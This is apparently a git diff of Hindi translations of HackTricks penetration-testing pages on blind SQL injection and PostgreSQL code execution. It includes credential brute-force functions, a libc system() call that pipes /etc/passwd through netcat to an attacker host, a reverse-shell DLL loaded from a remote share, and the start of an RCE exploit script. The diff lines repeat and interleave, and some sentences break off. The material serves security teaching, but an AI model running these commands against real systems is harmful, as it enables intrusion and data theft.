यदि किसी समय आपको तालिका का नाम पता है लेकिन आपको तालिका में कॉलमों का नाम नहीं पता है, तो आप कोशिश कर सकते हैं कि कितने कॉलम हैं उन्हें ढूंढने के लिए कुछ ऐसा निष्पादन करके:
यदि किसी समय आपको तालिका का नाम पता है परंतु आपको तालिका के अंदर कॉलम का नाम पता नहीं है, तो आप कोशिश कर सकते हैं कि कितने कॉलम हैं उन्हें ढूंढने के लिए कुछ ऐसा क्रियान्वित करके पता लगाएं:
```bash
# When a True is returned, you have found the number of columns
select (select "", "") = (SELECT * from demo limit 1); # 2columns
select (select "", "", "") < (SELECT * from demo limit 1); # 3columns
```
मान लीजिए कि 2 स्तंभ हैं (पहला स्तंभ ID है) और दूसरा झंडा है, तो आप झंडे की सामग्री को ब्रूटफोर्स करने के लिए प्रयास कर सकते हैं, एक अक्षर से दूसरे अक्षर तक:
यदि 2 स्तंभ हैं (पहला स्तंभ ID है) और दूसरा झंडा है, तो आप झंडे की सामग्री को ब्रूटफोर्स करने के लिए प्रयास कर सकते हैं, अक्षर के अक्षर को कोशिश करके:
```bash
# When True, you found the correct char and can start ruteforcing the next position
select (select 1, 'flaf') = (SELECT * from demo limit 1);
@ -146,7 +146,7 @@ select (select 1, 'flaf') = (SELECT * from demo limit 1);
### MySQL इतिहास
आप **sys.x$statement\_analysis** तालिका पढ़कर MySQL के भीतर अन्य क्रियाएँ देख सकते हैं
आप **sys.x$statement\_analysis** तालिका पढ़कर MySQL के अंदर अन्य क्रियाएँ देख सकते हैं
### संस्करण वैकल्पिक**s**
```
@ -173,9 +173,9 @@ mysql> select version();
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* अपने [**NFTs**](https://opensea.io/collection/the-peass-family) के अनन्य संग्रह [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में PR जमा करके**
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें
* प्राप्त करें [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** पर **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PRs सबमिट करके
</details>

View file

@ -4,26 +4,26 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को**.
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स रेपो** में पीआर जमा करके [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को**
</details>
**इस हमले के बारे में [अधिक जानकारी के लिए मूल पेपर में देखें](http://www.leidecker.info/pgshell/Having\_Fun\_With\_PostgreSQL.txt)**.
**इस हमले के बारे में अधिक जानकारी के लिए [मूल पेपर में जाएं](http://www.leidecker.info/pgshell/Having\_Fun\_With\_PostgreSQL.txt)**.
PL/pgSQL एक **पूरी विशेषताएँ वाली प्रोग्रामिंग भाषा** है जो SQL की क्षमताओं को बढ़ाकर **प्रक्रियात्मक नियंत्रण** प्रदान करती है। इसमें लूप्स और विभिन्न नियंत्रण संरचनाएँ शामिल हैं। PL/pgSQL भाषा में बनाए गए फ़ंक्शन SQL वाक्यों और ट्रिगर्स द्वारा आह्वानित किए जा सकते हैं, जिससे डेटाबेस वातावरण में कार्रवाई की व्याप्ति बढ़ जाती है।
PL/pgSQL एक **पूरी विशेषताएँ वाली प्रोग्रामिंग भाषा** है जो SQL की क्षमताओं को बढ़ाकर **प्रक्रियात्मक नियंत्रण** प्रदान करती है। इसमें लूप्स और विभिन्न नियंत्रण संरचनाएँ शामिल हैं। PL/pgSQL भाषा में बनाए गए फ़ंक्शन SQL वाक्यों और ट्रिगर्स द्वारा आह्वान किए जा सकते हैं, जिससे डेटाबेस वातावरण में कार्रवाई की व्याप्ति बढ़ जाती है।
आप इस भाषा का दुरुपयोग करके PostgreSQL से उपयोगकर्ताओं के क्रेडेंशियल्स को ब्रूटफ़ोर्स करने के लिए इस्तेमाल कर सकते हैं, लेकिन यह डेटाबेस पर मौजूद होना चाहिए। आप इसकी मौजूदगी की जांच करने के लिए इस्तेमाल कर सकते हैं:
आप इस भाषा का दुरुपयोग करके PostgreSQL से उपयोगकर्ताओं के क्रेडेंशियल्स को ब्रूटफ़ोर्स करने के लिए इस्तेमाल कर सकते हैं, लेकिन यह डेटाबेस पर मौजूद होना चाहिए। आप इसकी मौजूदगी की जांच कर सकते हैं:
```sql
SELECT lanname,lanacl FROM pg_language WHERE lanname = 'plpgsql';
lanname | lanacl
---------+---------
plpgsql |
```
डिफ़ॉल्ट रूप से, **फ़ंक्शन बनाना एक विशेषाधिकार है जो सार्वजनिक को प्रदान किया गया है**, जहां सार्वजनिक उस डेटाबेस सिस्टम पर हर उपयोगकर्ता को संदर्भित करता है। इसे रोकने के लिए, प्रशासक को सार्वजनिक डोमेन से USAGE विशेषाधिकार को रद्द करना पड़ सकता था:
डिफ़ॉल्ट रूप से, **फ़ंक्शन बनाना एक विशेषाधिकार है जो सार्वजनिक को प्रदान किया गया है**, जहां सार्वजनिक उस डेटाबेस सिस्टम पर हर उपयोगकर्ता को संदर्भित करता है। इसे रोकने के लिए, प्रशासक को सार्वजनिक डोमेन से USAGE विशेषाधिकार वापस लेना पड़ सकता था:
```sql
REVOKE ALL PRIVILEGES ON LANGUAGE plpgsql FROM PUBLIC;
```
@ -34,7 +34,7 @@ lanname | lanacl
---------+-----------------
plpgsql | {admin=U/admin}
```
नोट करें कि निम्नलिखित स्क्रिप्ट काम करने के लिए **फ़ंक्शन `dblink` मौजूद होना चाहिए**। अगर यह मौजूद नहीं है, तो आप इसे निम्नलिखित के साथ बनाने की कोशिश कर सकते हैं।
नोट करें कि निम्नलिखित स्क्रिप्ट काम करने के लिए **फ़ंक्शन `dblink` मौजूद होना चाहिए**। अगर यह मौजूद नहीं है तो आप इसे निम्नलिखित के साथ बनाने की कोशिश कर सकते हैं।
```sql
CREATE EXTENSION dblink;
```
@ -79,9 +79,9 @@ $$ LANGUAGE 'plpgsql';
//Call the function
select brute_force('127.0.0.1', '5432', 'postgres', 'postgres');
```
_ध्यान दें कि 4 वर्णों का ब्रूट फोर्सिंग करना कई मिनट ले सकता है।_
_ध्यान दें कि 4 वर्णों का ब्रूट फोर्सिंग कई मिनट ले सकता है।_
आप एक **वर्डलिस्ट डाउनलोड** भी कर सकते हैं और केवल उन पासवर्ड का प्रयास कर सकते हैं (शब्दकोश हमला):
आप भी **एक शब्द सूची डाउनलोड** कर सकते हैं और केवल उन पासवर्ड की कोशिश कर सकते हैं (शब्दकोश हमला):
```sql
//Create the function
CREATE OR REPLACE FUNCTION brute_force(host TEXT, port TEXT,
@ -120,10 +120,10 @@ select brute_force('127.0.0.1', '5432', 'postgres', 'postgres');
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, **The PEASS Family** की खोज करें
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **हैकिंग ट्रिक्स साझा करें** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) को PRs सबमिट करके
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर** **फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud)।
</details>

View file

@ -4,27 +4,27 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आपको **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड करने का एक्सेस चाहिए**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हूं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS और HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**।**
* **[हैकिंग ट्रिक्स साझा करें, hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PR जमा करके।
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** **पालन** करें।
* **हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud)** में पीआर जमा करके।
</details>
## PostgreSQL Extensions
PostgreSQL को एक मुख्य विशेषता के रूप में एक्सटेंसिबिलिटी के साथ विकसित किया गया है, जिससे यह एक्सटेंशन को ऐसे अंगिकारी तरीके से शामिल कर सकता है जैसे कि वे अंतर्निहित कार्यक्षमताओं थे। ये एक्सटेंशन, मुख्य रूप से सी में लिखी पुस्तकालयें, डेटाबेस को अतिरिक्त कार्यों, ऑपरेटर्स, या प्रकारों के साथ समृद्ध करती हैं।
PostgreSQL को एक मुख्य सुविधा के रूप में एक्सटेंसिबिलिटी के साथ विकसित किया गया है, जिससे यह ऐसा लगता है कि वे अंतर्निहित कार्यक्षमताओं के रूप में एक्सटेंशन को समर्न दता है। ये एक्सटेंशन, मुख्य रूप से सी में लिखी पुस्तकालयें हैं, डेटाबेस को अतिरिक्त कार्यों, ऑपरेटर्स, या प्रकारों के साथ समृद्ध करती हैं।
8.1 संस्करण से आगे, एक विशेष आवश्यकता एक्सटेंशन पुस्तकालयों पर लगाई जाती है: उन्हें एक विशेष हेडर के साथ कंपाइल किया जाना चाहिए। इसके बिना, PostgreSQL उन्हें नहीं चलाएगा, यह सुनिश्चित करता है कि केवल संगत और संभावित रूप से सुरक्षित एक्सटेंशन का उपयोग किया जाता है।
8.1 संस्करण से आगे, एक विशेष आवश्यकता एक्सटेंशन पुस्तकालयों पर लगाई गई है: उन्हें एक विशेष हेडर के साथ कंपाइल किया जाना चाहिए। इसके बिना, PostgreSQL उन्हें नहीं चलाएगा, यह सुनिश्चित करता है कि केवल संगत और संभावित रूप से सुरक्षित एक्सटेंशन का उपयोग किया जाता है।
इसके अलावा, ध्यान रखें कि **अगर आप नहीं जानते कि** [**PostgreSQL का दुरुपयोग करके विक्टिम को फ़ाइल अपलोड कैसे करें तो आपको इस पोस्ट को पढ़ना चाहिए।**](big-binary-files-upload-postgresql.md)
इसके अलावा, ध्यान रखें कि **अगर आप नहीं जानते कि** [**PostgreSQL का दुरुपयोग करके शिकार पर फ़ाइलें अपलोड कैसे करें तो आपको इस पोस्ट को पढ़ना चाहिए।**](big-binary-files-upload-postgresql.md)
### लिनक्स में RCE
**अधिक जानकारी के लिए देखें: [https://www.dionach.com/blog/postgresql-9-x-remote-command-execution/](https://www.dionach.com/blog/postgresql-9-x-remote-command-execution/)**
PostgreSQL 8.1 और पहले संस्करणों से सिस्टम कमांड का निष्पादन एक प्रक्रिया है जिसे स्पष्ट रूप से दस्तावेज़ीकृत किया गया है और सीधा है। इसका उपयोग करना संभव है: [Metasploit मॉड्यूल](https://www.rapid7.com/db/modules/exploit/linux/postgres/postgres_payload).
PostgreSQL 8.1 और पहले संस्करण से सिस्टम कमांड का निष्पादन एक प्रक्रिया है जिसे स्पष्ट रूप से दस्तावेज़ीकृत किया गया है और सीधा है। इसका उपयोग करना संभव है: [Metasploit मॉड्यूल](https://www.rapid7.com/db/modules/exploit/linux/postgres/postgres_payload).
```sql
CREATE OR REPLACE FUNCTION system (cstring) RETURNS integer AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;
SELECT system('cat /etc/passwd | nc <attacker IP> <attacker port>');
@ -78,7 +78,7 @@ $$ LANGUAGE 'plpgsql';
```
</details>
हालांकि, जब इसे अधिक वर्शन पर प्रयास किया गया **तो निम्नलिखित त्रुटि दिखाई दी गई थी**:
हालांकि, जब इसे अधिक वर्शन पर प्रयास किया गया **तो निम्न त्रुटि दिखाई गई**:
```c
ERROR: incompatible library “/lib/x86_64-linux-gnu/libc.so.6”: missing magic block
HINT: Extension libraries are required to use the PG_MODULE_MAGIC macro.
@ -90,9 +90,9 @@ HINT: Extension libraries are required to use the PG_MODULE_MAGIC macro.
SELECT version();
PostgreSQL 9.6.3 on x86_64-pc-linux-gnu, compiled by gcc (Debian 6.3.0-18) 6.3.0 20170516, 64-bit
```
अनुकूलता के लिए, मुख्य संस्करणों को संरेखित करना आवश्यक है। इसलिए, 9.6.x श्रृंखला के किसी भी संस्करण के साथ एक पुस्तकालय को कंपाइल करना सफल सम्मिलन सुनिश्चित करना चाहिए।
### अनुकूलता के लिए, मुख्य संस्करणों को संरेखित करना आवश्यक है। इसलिए, 9.6.x श्रृंखला के किसी भी संस्करण के साथ एक पुस्तकालय को कंपाइल करना सफल सम्मिलन सुनिश्चित करना चाहिए।
उस संस्करण को अपने सिस्टम में स्थापित करने के लिए:
**उस संस्करण को अपने सिस्टम में स्थापित करने के लिए:**
```bash
apt install postgresql postgresql-server-dev-9.6
```
@ -250,7 +250,7 @@ int32 arg = PG_GETARG_INT32(0);
PG_RETURN_INT32(arg + 1);
}
```
ध्यान दें कि इस मामले में **हानिकारक कोड DllMain फ़ंक्शन के अंदर** है। इसका मतलब है कि इस मामले में postgresql में लोड किए गए फ़ंक्शन को निष्पादित करने की आवश्यकता नहीं है, बस **DLL को लोड करना** रिवर्स शैल को **निष्पादित** करेगा:
ध्यान दें कि इस मामले में **हानिकारक कोड DllMain फ़ंक्शन के अंदर है**। इसका मतलब है कि इस मामले में postgresql में लोड किए गए फ़ंक्शन को निष्पादित करने की आवश्यकता नहीं है, बस **DLL लोड करना** रिवर्स शैल को **निष्पादित** करेगा:
```c
CREATE OR REPLACE FUNCTION dummy_function(int) RETURNS int AS '\\10.10.10.10\shared\dummy_function.dll', 'dummy_function' LANGUAGE C STRICT;
```
@ -258,11 +258,11 @@ CREATE OR REPLACE FUNCTION dummy_function(int) RETURNS int AS '\\10.10.10.10\sha
PostgreSQL के **नवीनतम संस्करणों** में, प्रतिबंध लगाया गया है जहां `superuser` को विशेष निर्देशित निर्देशिकाओं से बाहर साझा पुस्तकालय फ़ाइलें **लोड** करने से **रोका गया है**, जैसे Windows पर `C:\Program Files\PostgreSQL\11\lib` या \*nix सिस्टम पर `/var/lib/postgresql/11/lib`. ये निर्देशिकाएँ या तो NETWORK\_SERVICE या postgres खातों द्वारा लिखने के प्रक्रियाओं से **सुरक्षित** हैं।
इन प्रतिबंधों के बावजूद, एक प्रमाणीकृत डेटाबेस `superuser` को "बड़े ऑब्जेक्ट्स" का उपयोग करके फ़ाइल सिस्टम में **लिखना संभव** है। यह क्षमता `C:\Program Files\PostgreSQL\11\data` निर्देशिका के अंदर लिखने तक फैलती है, जो तालिकाएँ अपडेट या बनाने जैसे डेटाबेस प्रक्रियाओं के लिए आवश्यक है।
इन प्रतिबंधों के बावजूद, एक प्रमाणीकृत डेटाबेस `superuser` को "बड़े ऑब्जेक्ट्स" का उपयोग करके फ़ाइल सिस्टम में **बाइनर फ़ाइलें लिखना** संभव है। यह क्षमता `C:\Program Files\PostgreSQL\11\data` निर्देशिका के भीतर लिखने के लिए फैलाई जाती है, जो तालिकाएँ अपडेट या बनाने जैसे डेटाबेस प्रक्रियाओं के लिए आवश्यक है।
`CREATE FUNCTION` कमांड से एक महत्वपूर्ण सुरक्षा दोष उत्पन्न होता है, जो डेटा निर्देशिका में भ्रमण की अनुमति देता है। इस परिणामस्वरूप, एक प्रमाणीकृत हमलावर इस भ्रमण का शोध **उत्पन्न** कर सकता है ताकि वह डेटा निर्देशिका में एक साझा पुस्तकालय फ़ाइल लिख सके और फिर इसे **लोड** कर सके। यह उत्पादन हमलावर को विचारशील कोड को निषेध करने की अनुमति देता है, सिस्टम पर नेटिव कोड निष्पादन प्राप्त करता है।
`CREATE FUNCTION` कमांड से एक महत्वपूर्ण सुरक्षा दोष उत्पन्न होता है, जो डेटा निर्देशिका में भ्रमण की अनुमति देता है। इस परिणामस्वरूप, एक प्रमाणीकृत हमलावर इस भ्रमण का शोध **उत्पन्न** कर सकता है ताकि वह डेटा निर्देशिका में एक साझा पुस्तकालय फ़ाइल लिख सके और फिर उसे **लोड** कर सके। यह शोध आक्रमणकारी को अनियमित कोड निष्पादित करने की संभावना प्रदान करता है, जिससे सिस्टम पर नेटिव कोड निष्पादन होता है।
#### हमले की प्रवाह
#### हमल प्रवाह
सबसे पहले आपको **डीएल अपलोड करने के लिए बड़े ऑब्ज
```c
@ -271,8 +271,8 @@ select connect_back('192.168.100.54', 1234);
```
_ध्यान दें कि आपको `.dll` एक्सटेंशन जोड़ने की आवश्यकता नहीं है क्योंकि निर्माण फ़ंक्शन इसे जोड़ देगा।_
अधिक जानकारी के लिए **यहाँ से** [**मूल प्रकाशन पढ़ें**](https://srcincite.io/blog/2020/06/26/sql-injection-double-uppercut-how-to-achieve-remote-code-execution-against-postgresql.html)**।**\
उस प्रकाशन में **यह** [**कोड उपयोग किया गया था ताकि पोस्टग्रेस एक्सटेंशन उत्पन्न किया जा सके**](https://github.com/sourceincite/tools/blob/master/pgpwn.c) (_पोस्टग्रेस एक्सटेंशन को कैसे कंपाइल करें इसे सीखने के लिए किसी भी पिछले संस्करण को पढ़ें_।)\
अधिक जानकारी के लिए **यहाँ** [**मूल प्रकाशन पढ़ें**](https://srcincite.io/blog/2020/06/26/sql-injection-double-uppercut-how-to-achieve-remote-code-execution-against-postgresql.html)**।**\
उस प्रकाशन में **यह** [**कोड उपयोग किया गया था ताकि पोस्टग्रेस एक्सटेंशन उत्पन्न किया जा सके**](https://github.com/sourceincite/tools/blob/master/pgpwn.c) (_पोस्टग्रेस एक्सटेंशन को कैसे कंपाइल करें इसे सीखने के लिए किसी भी पिछले संस्करणों को पढ़ें_।)\
उसी पृष्ठ पर इस **तकनीक को स्वचालित करने के लिए** यह एक्सप्लॉइट दिया गया था:
```python
#!/usr/bin/env python3
@ -320,10 +320,10 @@ print(" drop function connect_back(text, integer);")
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण का उपयोग करना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाच करें!
* [**दी पीएएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक पीएएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**।**
* **अपने हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **नवीनतम संस्करण का पीईएएस या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाच करें!
* [**दी पीईएएस परिवार**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह देखें
* [**आधिकारिक पीएएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**
</details>

View file

@ -1,24 +1,38 @@
# PostgreSQL भाषाएँ
# RCE with PostgreSQL Languages
आपके पास पहुंच मिली PostgreSQL डेटाबेस में विभिन्न **स्क्रिप्टिंग भाषाएँ स्थापित** हो सकती हैं जिनका आप दुरुपयोग करके **विचारशील कोड को निष्पादित** कर सकते हैं।
<details>
आप इन्हें **चला सकते हैं**:
